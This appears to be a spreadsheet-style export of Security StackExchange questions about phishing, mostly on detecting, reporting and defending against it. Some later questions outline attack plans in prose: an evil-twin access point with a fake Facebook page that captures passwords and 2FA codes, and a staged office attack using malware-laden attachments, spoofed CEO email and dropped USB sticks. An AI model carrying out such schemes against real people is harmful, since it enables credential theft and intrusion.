    <t>&lt;p&gt;I received an email the other day purporting to be from a bank I hadn't even heard of, so I decided to poke around. On some quick investigation, it looks like something has just latched onto some poor Joe's WordPress based site and has dropped a whole bunch of pages designed to look like those of this bank.&lt;/p&gt;
 &lt;p&gt;Included also are confspy logs and a PHP-based remote administration tool, which is cleanly open to any persons at least as curious as I. It even has such helpful options as "format the box".&lt;/p&gt;
 &lt;p&gt;It's worth noting that the pages that are linked to in the emails don't really stand up to scrutiny - Google Chrome immediately picks it up as a phishing attempt, and I'd imagine all the other major browsers would too.&lt;/p&gt;
 &lt;p&gt;I had half a mind briefly to just format the box, but alas I don't want to ruin poor Joe's WordPress website, nor do I want to ruin any information that might be used for more skilled people than myself. While I do doubt this would be something new and amazing in the wild, there's certainly some interesting stuff here. What are some relevant avenues to pursue in relation to either reporting this or finding out just what's going on? Is it even ethical to poke at this box as a learning exercise as long as any hat I wear is white?&lt;/p&gt;
 &lt;p&gt;edit: There &lt;em&gt;is&lt;/em&gt; apparently a self-remove function as well. Looks like all information collected is sent to two different email addresses, which I notice have been used in other phishing exploits, so there's nothing new here - same php template, new bank facade.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;unix&gt;&lt;ethics&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>Emails from compromised websites</t>
  </si>
  <si>
    <t>Best practice for informing a website they've been compromised?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've received a spam email that claims to be invoicing me for some service in New Jersey, USA with whom I've not had any dealings. The email includes a link to a zip file that is hosted on a greek restaurant website in the Netherlands. &lt;/p&gt;
 &lt;p&gt;This, to my mind is a compromised website who are most likely unaware of their situation.&lt;/p&gt;
 &lt;p&gt;Should I inform them? or their webhost? and if so what is advised?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;disclosure&gt;&lt;ethics&gt;</t>
  </si>
  <si>
    <t>Is it phishing? Human/Manual detection and reporting, This was block by my filter, is it phishing? and        Applying technical defences</t>
  </si>
  <si>
    <t>Both</t>
  </si>
  <si>
    <t>Alternative for passwords</t>
  </si>
  <si>
    <t>How to prove ownership of a website?</t>
  </si>
  <si>
    <t>&lt;p&gt;We all know how banks identify themselves to users. No, not through TLS certificates. The users pay no attention to those. No, I'm talking about &lt;em&gt;branding&lt;/em&gt;-- all those fancy logos and stock photos that give you the impression it's your actual banking site.&lt;/p&gt;
 &lt;p&gt;The trouble is that anyone can copy those images for themselves and make a convincing fake of a bank's site, and trick users into entering their banking password, even though the site they're on is the wrong domain. This is why phishing works.&lt;/p&gt;
 &lt;p&gt;So since users don't check the domain name or TLS certificate chain, how else can we prove, before they enter their password, that they're on a site they should trust? (e.g., showing an image the user could recognize, but a third party would have trouble forging, like a reverse captcha)&lt;/p&gt;
 &lt;p&gt;(P.S. The obvious alternative solution is not to require a password at all, like in Google Authentication, but I'm retrofitting a set of websites and I'm looking for alternatives.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;webserver&gt;&lt;phishing&gt;&lt;identity&gt;&lt;captcha&gt;</t>
  </si>
  <si>
    <t>Blocking emails</t>
  </si>
  <si>
    <t>Whitelisted, encrypted, signed e-mails: how could they be tricked?</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a company that has problems with Phishing (try to defend against it). Using internal mails. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;The big question:&lt;/strong&gt; What security problems can occur when trying the following solution?: &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;All mails that are NOT signed and encrypted are NOT accepted/bounced. &lt;/p&gt;
  &lt;p&gt;If given user will never communicate with the outside word via e-mail
  then mails sent/received to/from the public internet need to be
  bounced back.&lt;/p&gt;
  &lt;p&gt;Of course only a valid users key is accepted, not *, so allowed keys
  are whitelisted.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Can this solution be tricked somehow? &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;We can only think of that a valid users machine would be hacked from outside and thus the attacker would have a valid keypair. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Or if trying with S/MIME, there could be a CA that would offer bogus certs. &lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;pgp&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is Google a feasible tool for an organization to check if their name is being used in phishing sites?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is it feasible for an organization to use Google and the available Google search operators (e.g. &lt;code&gt;allinurl&lt;/code&gt;, etc) to find out if their organization name is being spoofed or used in phishing sites and then subsequently report them to relevant authorities such as CERT?&lt;/p&gt;
 &lt;p&gt;Are there any other better solution than this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>The use of different password prompts messages</t>
  </si>
  <si>
    <t>Distinguish origin of password prompts</t>
  </si>
  <si>
    <t>&lt;p&gt;I am wondering how to distinguish (password) prompts that the OS issued from prompts that are delivered application-side. This question first occurred to me when considering Firefox master passwords, but it just occurred to me that installing packages over &lt;code&gt;apt&lt;/code&gt; may raise the same question (e.g. when the installation process takes some while)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[sudo] password for &amp;lt;user&amp;gt;:
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I see nothing preventing attackers to include such a prompt in their package installation scripts. Do I have that correct (this is interesting especially for AUR packages/Arch Linux, I believe, and any other package source that is not implicitly trustworthy)?&lt;/p&gt;
 &lt;p&gt;Apart from reviewing the package source, is there any other reliable method to distinguish the origin of a prompt, e.g. viewing a specific log?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;web-browser&gt;&lt;phishing&gt;&lt;package-manager&gt;</t>
  </si>
  <si>
    <t>A security tool does not provide full defence</t>
  </si>
  <si>
    <t>How does Stripe Checkout prevent phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;The Stripe Checkout overlay (&lt;a href="https://stripe.com/checkout" rel="nofollow"&gt;https://stripe.com/checkout&lt;/a&gt;) pops up within a site and does not show the associated URL.
 A malicious website could create its own overlay that looks like Stripe's, and trick users into thinking that they are giving their credit card info to Stripe.com&lt;/p&gt;
 &lt;p&gt;Is it possible that Stripe is doing something to prevent this? Or is it just not enough of a concern for them?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;credit-card&gt;&lt;vulnerability&gt;&lt;phishing&gt;&lt;payment-gateway&gt;</t>
  </si>
  <si>
    <t>FIDO</t>
  </si>
  <si>
    <t>How secure are the FIDO U2F tokens</t>
  </si>
  <si>
    <t>&lt;p&gt;Google and Yubico just announced the availability of cryptographic security tokens following the FIDO U2F specification. Is this &lt;em&gt;just another 2FA option,&lt;/em&gt; or is this significantly better than solutions such as SecureID and TOTP?&lt;/p&gt;
 &lt;p&gt;Specifically: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;In what way is U2F fundamentally different from OTP?&lt;/li&gt;
 &lt;li&gt;How does U2F affect the feasibility of phishing attacks in comparison to OTP systems?&lt;/li&gt;
 &lt;li&gt;How feasible are non-interactive attacks against U2F (e.g. brute-force, etc)?&lt;/li&gt;
 &lt;li&gt;Can I safely use a single U2F token with multiple independent services?&lt;/li&gt;
 &lt;li&gt;How does U2F stack up against other commercial offerings? Are there better solutions available?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;multi-factor&gt;&lt;one-time-password&gt;&lt;fido&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">External Email warning </t>
  </si>
  <si>
    <t>Are external email warnings effective?</t>
  </si>
  <si>
    <t>&lt;p&gt;Conceptually, &amp;quot;THIS EMAIL IS FROM AN EXTERNAL SENDER&amp;quot; warnings should be useful at preventing phishing or spoofing attacks. If &amp;quot;your boss&amp;quot; asks you to buy a bunch of gift cards and you see that warning, maybe you catch it.&lt;/p&gt;
 &lt;p&gt;With so many legitimate external emails received, I'd imagine users may get a sort of &lt;a href="https://en.wikipedia.org/wiki/Banner_blindness" rel="nofollow noreferrer"&gt;banner blindness&lt;/a&gt; and not even see them, reducing the effectiveness of the warning.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is there any data-backed research that shows the effectiveness of external sender warnings?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;end-user&gt;</t>
  </si>
  <si>
    <t>OpenID Connect/OAuth 2.0 and "fake" official apps</t>
  </si>
  <si>
    <t>&lt;p&gt;My question mostly pertains to OpenID Connect, but can be applied to OAuth 2.0 as well.&lt;/p&gt;
 &lt;p&gt;When it comes to an OpenID Connect Client doing the "authorize" dance with the OpenID Connect Provider, the client sends its Client ID to the Provider to state which one it is. This is used in places such as the "consent" screens, which prominently display which scopes you are willing to allow the client to use with the Relying Party as a part of the access tokens that will be issued. The Client ID might also be marked as "special" in some way, like if it is for an "official app" it might allow this app to bypass certain consent screens that would otherwise be displayed to a third-party or display prominent visual cues to the user that this is an official "trustworthy" app.&lt;/p&gt;
 &lt;p&gt;My question revolves around to how to prevent said apps from being impersonated. With server-side apps these are protected through the use of a "Client Secret" which is unavailable to a malicious client. With browser-based clients (using the "implicit" flow), the "Client ID" is bound to a specific post-authentication redirect, which means a malicious client that is fraudulently using the "official" client's Client ID would never see the granted tokens, since the browser would redirect back to the wrong place (or the redirect URL would be rejected.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;How do native apps, such as iOS or Android apps prevent against this kind of attack where the Client ID/Secret is stolen out of a legitimate app and used by a rogue app to impersonate it during OpenID Connect auth flows?&lt;/strong&gt; As far as I see it, I could "steal" the Client ID (and/or the Client Secret) embedded in the "official" app, upload a rogue app to the App Store/Play Store that uses said ID/Secret, and then make sure the redirect URI that's used is the same as the official app. My rogue app would then listen to that redirect URL for the resulting tokens, and during the authorization dance the screens displayed to the user would prominently state that this is an "official" app and/or bypass those consent screens entirely, even though this is a third-party app.&lt;/p&gt;
 &lt;p&gt;(Sorry for the wall of text leading up to the question! Just wanting to make sure all of my assumptions are correct! Please, tell me if I have anything wrong!)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;oauth2&gt;&lt;openid-connect&gt;</t>
  </si>
  <si>
    <t>How do I verify that in-app social login dialogs are secure?</t>
  </si>
  <si>
    <t>&lt;p&gt;If I have a mobile app that supports some kind of social login feature, say, to login to the app from my Facebook account, and if the app opens the Facebook login page inside the app in a mobile, is there any way to verify that I am indeed connected to the Facebook site?&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/00yc9.jpg" alt="instagram login"&gt;&lt;/p&gt;
 &lt;p&gt;This is from an app that lets me sync Instagram profile photo with my phone contacts. I trust this app, and once I log in, I have to accept the app permissions. &lt;/p&gt;
 &lt;p&gt;The problem is that the links do not open in a standard browser, and I cannot check the URL. If someone were to create an app, add such login button, and opened a fake site to collect my password, it looks quite possible to me because I cannot see any HTTPS EV certificate information or let alone the URL of the login page. &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;as a consumer, how can I make sure that such embedded login pages are legit?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;http&gt;&lt;mobile&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Exploring what phishers gain and how</t>
  </si>
  <si>
    <t>Is phishing ineffective against a Gmail account that has 2FA?</t>
  </si>
  <si>
    <t>&lt;p&gt;According to my knowledge, phishing basically only steals the email id and password, right?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multi-factor&gt;&lt;phishing&gt;&lt;u2f&gt;</t>
  </si>
  <si>
    <t>Gerenal questions on the impcat of phishing</t>
  </si>
  <si>
    <t>What are effective ways to prevent targeted phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Phishing" rel="noreferrer"&gt;Phishing&lt;/a&gt; is a very serious problem that we face. Popular banks are often the biggest targets. What methods can a bank website use to protect its self from phishing attacks? What security systems should someone use to protect themselves? Why do these methods work? &lt;/p&gt;</t>
  </si>
  <si>
    <t>How emails without MX records are treated by phishing filters</t>
  </si>
  <si>
    <t>Spam/Phishing detection when there is no MX record</t>
  </si>
  <si>
    <t>&lt;p&gt;While SPF/DKIM/DMARC are standard, foundational tools to help protect an email-sending domain from spoofing, what about domains that do not send emails?&lt;/p&gt;
 &lt;p&gt;How do spam or phishing filters treat emails from domains without MX records? If they are checking DNS for SPF/DKIM/DMARC, certainly they also check for MX and score the incoming email appropriately. Do they?&lt;/p&gt;
 &lt;p&gt;This matters in terms of the level of email spoofing protection that we might need to consider for non-email-sending domains. Do we need to add in a bunch of SPF records for parked domains, for example?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;filtering&gt;</t>
  </si>
  <si>
    <t>How can hackers guess passwords (using dictionary attack or brute force) without being locked out?</t>
  </si>
  <si>
    <t>&lt;p&gt;Nowadays almost every website you want to register in; is asking you to create a complicated password...But why cant we use simple passwords?&lt;/p&gt;
 &lt;p&gt;I am just wondering because in case of multiple wrong password attempts; many websites and devices nowadays are using lock out system which either locks you out permanently until recovery options are followed OR locks you out for specific period of time...Moreover some websites use captcha to ensure that there is a human being on the other side and not just a tool or script....&lt;/p&gt;
 &lt;p&gt;If anyone can elaborate on this please....how is it practical (or even possible) for hackers to guess a password with these security measures that are in place....&lt;strong&gt;I know&lt;/strong&gt; it happens because it happened to me. I had a Yahoo email account with a 6 character password (letters and numbers but no special characters or caps) and a hacker managed to gain access to it and started spamming my address book contacts. And I am sure my password was &lt;strong&gt;not captured&lt;/strong&gt; through phishing, social engineering or keylogger.&lt;/p&gt;
 &lt;p&gt;I am not looking for the exact tools or scripts, I am just looking for what is the idea behind a successful password guess in spite of security measures in place that do not entertain guessing. &lt;strong&gt;So for example&lt;/strong&gt;, even if my password was only letters and was only six characters, how can someone guess my &lt;strong&gt;gmail&lt;/strong&gt; password?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;brute-force&gt;</t>
  </si>
  <si>
    <t>user45139</t>
  </si>
  <si>
    <t>Are there actions taken against websites that deliver malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;There are serious tools and services such as &lt;a href="https://www.google.com/safebrowsing/report_badware/"&gt;Google Safe Browsing&lt;/a&gt; for malicious and phishing websites, and others fully dedicated to phishing websites such as &lt;a href="http://www.phishing.org/"&gt;Phishing.org&lt;/a&gt;.&lt;br&gt;&lt;br&gt;
 What is done against these websites (especially the ones that distribute malware, with &lt;a href="http://www.comodo.com/resources/home/newsletters/nov-10/ask-geekbuddy.php"&gt;drive-by download attack&lt;/a&gt;, for instance) once they are publicly flagged so ? Are they blocked later or something like that ? For example there has been a multi-national action against the &lt;a href="http://www.fbi.gov/news/pressrel/press-releases/u.s.-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware-charges-botnet-administrator"&gt;GameOver Zeus Botnet&lt;/a&gt;. Is there something like that against the malicious websites ? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Are these phishing techniques</t>
  </si>
  <si>
    <t>Does phishing include ransomware?</t>
  </si>
  <si>
    <t>&lt;p&gt;Does the definition of &lt;em&gt;phishing&lt;/em&gt; also include tricking the victim into executing malware, such as ransomware, that's &lt;strong&gt;not&lt;/strong&gt; used to retrieve the victim's information?&lt;/p&gt;
 &lt;p&gt;As I see it, &lt;a href="https://en.wikipedia.org/wiki/Phishing" rel="noreferrer"&gt;Wikipedia's definition&lt;/a&gt; of phishing does not include ransomware:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords and credit card details or other sensitive details, by impersonating oneself as a trustworthy entity in a digital communication.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Contrary, &lt;a href="https://www.sonicwall.com/resources/ebook/ebook-how-ransomware-can-hold-your-business-hostage/" rel="noreferrer"&gt;this guide from SonicWall&lt;/a&gt; does include ransomware in the definition of phishing:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;One of the most common distribution methods of ransomware is phishing emails. These types of emails attempt to entice recipients to open an email and click on a website link. The site may ask for sensitive information or contain malware, such as ransomware, that is downloaded onto the victim‚Äôs system.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://www.proofpoint.com/sites/default/files/gtd-pfpt-uk-tr-state-of-the-phish-2020-a4_final.pdf" rel="noreferrer"&gt;Proofpoint&lt;/a&gt;, too, includes ransomware infections as part of phishing:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;‚ÄúPhishing‚Äù can mean different things to different people, but we use the term in a general sense. In the context of this report, phishing encompasses all socially engineered emails, regardless of the specific malicious intent (such as directing users to dangerous websites, distributing malware, collecting credentials and so on)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I know about &lt;a href="https://security.stackexchange.com/questions/173094/why-is-phishing-becoming-synonymous-with-ransomware"&gt;this&lt;/a&gt; discussion, but could it be that there's a specific and a general definition of the concept of &lt;em&gt;phishing&lt;/em&gt;? Or is there a case for saying that there's &lt;strong&gt;only one&lt;/strong&gt; definition (making the specific or the general definition incorrect)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;ransomware&gt;&lt;terminology&gt;</t>
  </si>
  <si>
    <t>Trusted Certificate Authorities - how do they work?</t>
  </si>
  <si>
    <t>&lt;p&gt;microsoft.com for example can use a Verisign Certificate for their domain. What are the chances that an attacker could ask verisign for a m1crosoft.com domain and get approved? It is very simillar, but still can be used by attackers to run a "secured phishing website".&lt;/p&gt;
 &lt;p&gt;Do trusted CA's do some research on a client that asks for a new certificate to be issued? Is there a standard or an application model? Do i need to assume and not trust secure websites in reality if not?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;public-key-infrastructure&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>Benifit of authenticating every transaction</t>
  </si>
  <si>
    <t>What are the advantages of multi-level authentication?</t>
  </si>
  <si>
    <t>&lt;p&gt;By multi-level authentication, I am referring to the fact that the user makes use of a primary username password keypair to log into his account. Then, to perform some other actions, such as authorize a transaction, he is required to reauthenticate himself by providing a secondary password or passphrase. &lt;/p&gt;
 &lt;p&gt;So, what are the advantages of multi-level authentication? The only advantage that comes to my mind is that in case a user left his account open by mistake or someone knows the primary username and password, then they won't be able to do anything.&lt;/p&gt;
 &lt;p&gt;However, what about phishing, keylogging and man-in-the-browser attacks? Am I right in saying that multi-level authentication provides no security at all against these types of attacks? Thank you very much :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;man-in-the-middle&gt;&lt;keyloggers&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What are known domain hijacking methods?</t>
  </si>
  <si>
    <t>&lt;p&gt;The definition of domain hijacking is: "to gain (temporarily) control a domain" which could be either through:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Stealing the legal and/or technical ownership of a domain (for example by transferring the domain to another registrar);&lt;/li&gt;
 &lt;li&gt;Gaining control of the registered name servers and pointing the domain to another endpoint;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;strong&gt;What are known domain hijacking methods?&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;For example to claim an expired administrative email address and request a domain transfer at the domain registrar. Or, to use phishing techniques.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;I suppose the Extensible Provisioning Protocol (EPP) is somehow related to protection against this?&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;domain&gt;&lt;whois&gt;&lt;epp&gt;</t>
  </si>
  <si>
    <t>Why are Let's Encrypt certificates accepted by default by browsers?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently almost got caught by a phishing attempt, due to the use of a relatively convincing domain name and valid SSL certificate (specifically &lt;a href="https://www.sslshopper.com/ssl-checker.html#hostname=customs-tax.uk" rel="noreferrer"&gt;this website&lt;/a&gt;). When checking the certificate it turns out it was issued by Let's Encrypt. So I went there and as far as I understand the process to issue a certificate is automated - if you own a domain, you can get a certificate.&lt;/p&gt;
 &lt;p&gt;However isn't it a security issue and doesn't it go (at least partially) against the point of SSL certificates? Malicious websites can now look legitimate thanks to these certificates, which makes it a lot more likely that they will succeed. In my case I saw the green padlock on the URL and thought that all was good. Now it seems, due to this certificate issuer, users will be expected to click on that padlock and check who issued the certificate (and close the tab if it's from letsencrypt??).&lt;/p&gt;
 &lt;p&gt;So I'm wondering, given the security risk, why do browsers accept this certificate by default? I'm surprised especially that Chrome does given how careful Google is with security. Do they consider that letsencrypt is a good idea?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificates&gt;&lt;letsencrypt&gt;</t>
  </si>
  <si>
    <t>Why does Outlook not block spam sent by employees?</t>
  </si>
  <si>
    <t>&lt;p&gt;Our organization uses Outlook as email service and hence have our organization email domain. If someone from the organization sends a spam or phishing email to someone else in our organization, its received by the recipient.&lt;/p&gt;
 &lt;p&gt;I tried sending a simple spam email (copied from personal Gmail account Spam folder) from my organization domain to someone in the organization, and it was received by the recipient.&lt;/p&gt;
 &lt;p&gt;In the Junk Folder in Outlook, there were few spam emails, which means that Outlook does filter spam emails. But still, it does not capture simple spam emails.&lt;/p&gt;
 &lt;p&gt;Why? Are there any policies of Outlook, that let someone in organization send anything to others in the organisation?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;spam&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>New? tools privacy</t>
  </si>
  <si>
    <t>Anti-virus anonymity question</t>
  </si>
  <si>
    <t>&lt;p&gt;Many people pay for VPNs and select the VPN based on whether or not that VPN keeps logs of the user's activities and if so for how long. The motivation is privacy- they don't want their surfing habits to be known. Of course they take other steps , controlling cookies etc to control their privacy also. &lt;/p&gt;
 &lt;p&gt;My question is how privacy is potentially effected anti-virus software. As far as I can tell virtually all of the anti-virus makers now attempt to identify phishing sites and other malicious URLS. In order to do this, they intercept every url their customer surfs to, in order to examine it for viruses or check it against, say, a black list of known bad urls. \&lt;/p&gt;
 &lt;p&gt;My question is, aren't these companies in a position to benefit or monetize their user's definitive clickstreams? I read the privacy policy of two, BitDefender and Eset and they both sort of say, to the best of my ability to understand, that you're permitting them total access to all knowledge of when and where you surf, full stop. They then say they might share any information they collect with their partners yadda yadda yadda. This was my understanding of their privacy policies and maybe I am mistaken. &lt;/p&gt;
 &lt;p&gt;My question is- very many people go out of their way to read the TOS for their VPNs to make sure they're not being logged, but these anti-virus companies make NO promises about any logs they might keep or for how long. &lt;/p&gt;
 &lt;p&gt;People who are worried enough about getting hacked and privacy that they buy a VPN also are likely to use an anti-virus it seems to me. Is this an example of badly compartmentalized risk assessment ? It seems like the anti-virus companies have and may keep all the information users were so worried about their VPN having and keeping? &lt;/p&gt;
 &lt;p&gt;Have I got this wrong? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privacy&gt;&lt;vpn&gt;&lt;antivirus&gt;</t>
  </si>
  <si>
    <t>Not sure if a legit practice might be dangerous</t>
  </si>
  <si>
    <t>Central Authentication Service</t>
  </si>
  <si>
    <t>Does not using CAS when it's availible encourage phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;My (U.S., R1) academic institution uses CAS (Central Authentication Service) to authenticate almost all our web services. &lt;/p&gt;
 &lt;p&gt;However, they don't use CAS for our GitHub Enterprise instance. Instead they use LDAP, so the login page says "GitHub Enterprise", and there is nothing to indicate it's an official page of our institution except that the URL is under our .edu domain. &lt;/p&gt;
 &lt;p&gt;Beyond the fact that this bypasses our Duo 2FA deployment, I'm concerned that presenting users with a login page that expects their CAS password but isn't the normal CAS login page encourages phishing attacks by diluting the message of only putting your password into clearly official, institutionally-affiliated websites. &lt;/p&gt;
 &lt;p&gt;Is this valid, and is it worth raising with our campus IT department? (I'm a graduate student.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Using several domains for the same brand</t>
  </si>
  <si>
    <t>Why would PayPal send messages from another domain?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have just received a message asking to consent to PayPal policy updates from the domain:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://epl.paypal-communication.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The actual link is full of trackers. Given the domain name, it sounds like a routinely email spoof. Also, visiting the domain, you are welcomed by a "503 Service Unavailable" message. &lt;/p&gt;
 &lt;p&gt;After some investigations, including &lt;code&gt;whois&lt;/code&gt;, the weird domain seems really linked to PayPal.com. That being the case:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Why should a company (and in particular a company dealing with payments) send messages from another domain? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Why add countless trackers if you can already recognise users from logon?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Should the practice of sending messages from &lt;code&gt;somecompany.com&lt;/code&gt; using &lt;code&gt;anothercompany.com&lt;/code&gt; become established, it will be virtually impossible to us users telling if a website is legit or a scam.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;paypal&gt;</t>
  </si>
  <si>
    <t>Why would a phishing blacklist be hashed?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was planning to comment on the question at &lt;a href="https://security.stackexchange.com/questions/190235/finding-phishing-sites-to-certain-domain"&gt;Finding phishing sites to certain domain&lt;/a&gt; and suggest searching Google's blacklist for keywords or substrings of a domain name in question.&lt;/p&gt;
 &lt;p&gt;But then I found &lt;a href="https://stackoverflow.com/questions/44663025/how-to-test-if-a-url-is-a-phishing-in-command-line-using-google-safe-browsing"&gt;https://stackoverflow.com/questions/44663025/how-to-test-if-a-url-is-a-phishing-in-command-line-using-google-safe-browsing&lt;/a&gt; which says the blacklist is hashed, which makes it useless for the first question above. There's a link to &lt;a href="https://developers.google.com/safe-browsing/v4/urls-hashing" rel="nofollow noreferrer"&gt;https://developers.google.com/safe-browsing/v4/urls-hashing&lt;/a&gt; which explains the hashing, but doesn't explain &lt;em&gt;why&lt;/em&gt; the list is hashed.&lt;/p&gt;
 &lt;p&gt;Why hashed? What security problem does that solve? It seems all hashing does is cripple the list's potential usefulness.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;hash&gt;&lt;phishing&gt;&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Planning phishing and spam</t>
  </si>
  <si>
    <t>defeat Two-Factor Authentication</t>
  </si>
  <si>
    <t>Does this concept attack work to harvest credentials and 2FA using offline fake site?</t>
  </si>
  <si>
    <t>&lt;p&gt;My concept is this:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Client connects to Malicious\Eviltwin AP&lt;/li&gt;
 &lt;li&gt;Client connects to &lt;code&gt;www.facebook.com&lt;/code&gt; but this one is a fake offline site by the fake dns server&lt;/li&gt;
 &lt;li&gt;Client enters user and password ---&gt; attacker gets credentials&lt;/li&gt;
 &lt;li&gt;Attacker use the creds to enter into 2Factor Auth page of facebook&lt;/li&gt;
 &lt;li&gt;Attacker replicate/prompts 2FA fake page also offline and gets the 2FA Code&lt;/li&gt;
 &lt;li&gt;Attacker gain full access to the account&lt;/li&gt;
 &lt;li&gt;Sends error message to client and then prompt him into the real facebook&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;My questions are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Is this thing working in a real scenario? 2FA can't block access of the attacker? &lt;/li&gt;
 &lt;li&gt;Can you host offline https site and fake certificates to make less suspicious the site? &lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;appsec&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Ethical Hacking fo improving security measurements</t>
  </si>
  <si>
    <t>Reality Check: Create chaos at an office</t>
  </si>
  <si>
    <t>&lt;p&gt;An opportunity has arisen for me to perform a "real hacking attack" on a TV show. The target is to attack the TV headquarters and cause as much chaos as possible. The idea is to show how a business needs to improve their security or "really bad things can happen".&lt;/p&gt;
 &lt;p&gt;Management will be aware of the attack and all the corresponding legal documents will be signed and approved beforehand. Other employees will have no idea.&lt;/p&gt;
 &lt;p&gt;There will be a camera recording on the attacked office (hidden, so employees don't become suspicious), and another one recording "the attacker".&lt;/p&gt;
 &lt;p&gt;Some things can be "faked" for dramatic effect, but we want to show what a real attack looks like. There will be a "pawnage day" where at 12:00 AM the attack will take place &lt;/p&gt;
 &lt;p&gt;I have 2 months to prepare this. I have had prior experience of penetration testing, mostly web-apps and wi-fi. No direct experience with malware or phishing at all, but I know the theory.&lt;/p&gt;
 &lt;p&gt;I have thought about what attacks to show and perform:&lt;/p&gt;
 &lt;p&gt;Prior to "pawnage day":&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Send a phishing campaign with an attached excel document with malware&lt;/li&gt;
 &lt;li&gt;Use LinkedIn to find the name of the CEO and send the phishing emails
 spoofing his email account for credibility&lt;/li&gt;
 &lt;li&gt;Use social engineering and infiltrate as a "repairman". Stuck "evil 
 USB's" everywhere. All this while wearing a hidden camera.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;During "pawnage day" attack:&lt;/p&gt;
